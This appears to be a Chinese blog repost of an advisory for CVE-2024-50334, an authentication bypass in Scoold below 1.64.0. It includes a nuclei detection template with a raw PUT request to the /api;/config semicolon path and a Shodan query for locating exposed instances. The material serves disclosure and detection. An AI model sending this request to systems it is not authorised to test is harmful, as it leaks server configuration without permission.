Scoold 认证绕过漏洞

漏洞信息

漏洞名称: Scoold 认证绕过漏洞

漏洞编号:

  • CVE: CVE-2024-50334

漏洞类型: 权限绕过

漏洞等级: 中危

漏洞描述: Scoold是一个为团队设计的问答和知识共享平台,广泛应用于企业内部的知识管理和团队协作场景。该平台允许用户提问、回答问题以及共享知识,支持多种部署方式,包括云服务和本地部署。由于其便捷的功能和易用性,Scoold在多个行业和组织中得到广泛应用。该漏洞存在于Scoold平台的/api;/config端点,攻击者通过在URL中追加分号,可以绕过认证机制,未经授权访问敏感的配置数据。此外,通过向/api;/config端点发送PUT请求,并设置Content-Type为application/hocon,攻击者可以利用HOCON文件包含漏洞读取服务器上的文件。这一漏洞的技术根源在于输入验证不充分,导致攻击者能够构造特殊的请求绕过认证和访问控制。利用此漏洞,攻击者可以获取服务器上的敏感信息,如配置文件,这些信息可能被用于进一步的攻击。此漏洞的影响范围包括信息泄露和潜在的进一步系统入侵,攻击无需认证即可远程执行,且可以自动化利用。Scoold 1.64.0版本已修复此漏洞,临时解决方案可通过设置scoold.api_enabled = false禁用Scoold API来缓解风险。

产品厂商: erudika

产品名称: Scoold

影响版本: < 1.64.0

搜索语法: html:”scoold-wrapper”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/c23fb5579a5c6d46c95f305b6ec19abe281e4920/http%2Fcves%2F2024%2FCVE-2024-50334.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

id: CVE-2024-50334

info:
name: Scoold < 1.64.0 - Authentication Bypass
author: xbow,iamnoooob,pdresearch
severity: medium
description: |
Scoold is a Q&A and a knowledge sharing platform for teams. A semicolon path injection vulnerability was found on the /api;/config endpoint. By appending a semicolon in the URL, attackers can bypass authentication and gain unauthorised access to sensitive configuration data. Furthermore, PUT requests on the /api;/config endpoint while setting the Content-Type- application/hocon header allow unauthenticated attackers to file reading via HOCON file inclusion. This allows attackers to retrieve sensitive information such as configuration files from the server, which can be leveraged for further exploitation. The vulnerability has been fixed in Scoold 1.64.0. A workaround would be to disable the Scoold API with scoold.api_enabled = false.
reference:
- https://xbow.com/blog/xbow-scoold-vuln/
- https://nvd.nist.gov/vuln/detail/CVE-2024-50334
- https://github.com/Erudika/scoold/releases/tag/1.64.0
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-50334
cwe-id: CWE-288
epss-score: 0.00118
epss-percentile: 0.31616
cpe: cpe:2.3:a:erudika:scoold:*:*:*:*:*:*:*:*
metadata:
vendor: erudika
product: scoold
shodan-query: html:"scoold-wrapper"
verified: true
max-request: 1
tags: cve,cve2024,scoold,info-leak,erudika,auth-bypass

http:
- raw:
- |
PUT /api;/config HTTP/1.1
Host: {{Hostname}}
Content-Type: application/hocon

matchers:
- type: dsl
dsl:
- 'contains(body, "scoold.app_name")'
- 'contains(content_type,"application/json")'
- 'status_code==200'
condition: and



Scoold 认证绕过漏洞
http://example.com/2025/07/05/github_973203964/
作者
lianccc
发布于
2025年7月5日
许可协议